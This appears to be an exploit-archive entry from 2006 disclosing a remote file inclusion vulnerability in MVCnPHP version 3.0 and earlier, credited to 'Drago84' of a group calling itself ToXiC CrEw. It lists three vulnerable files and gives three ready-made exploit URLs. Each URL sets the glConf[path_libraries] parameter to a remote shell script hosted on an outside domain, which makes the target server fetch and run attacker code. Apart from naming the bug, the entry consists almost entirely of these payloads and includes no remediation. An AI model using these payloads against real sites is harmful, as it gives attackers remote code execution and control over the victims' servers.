id: 684
date: 08/09/2006
title: MVCnPHP <= 3.0 glConf[path_libraries] Remote Include Vulnerabilities
author: Drago84
cves: 

====================================================================
MVCnPHP <= 3.0 glConf[path_libraries] Remote Include Vulnerabilities
====================================================================



MVCnPHP Remote File Inclusion

############ToXiC CrEw###############

Bug Found by Drago84


Page Affect:
BaseCommand.php
BaseLoader.php
BaseView.php

ExP:
http://www.sito.com/dir_mvcnphp/BaseCommand.php?glConf[path_libraries]=http://evalsite.com/shell.php
http://www.sito.com/dir_mvcnphp/BaseLoader.php?glConf[path_libraries]=http://evalsite.com/shell.php
http://www.sito.com/dir_mvcnphp/BaseView.php?glConf[path_libraries]=http://evalsite.com/shell.php



#  0day.today [2023-03-27]  #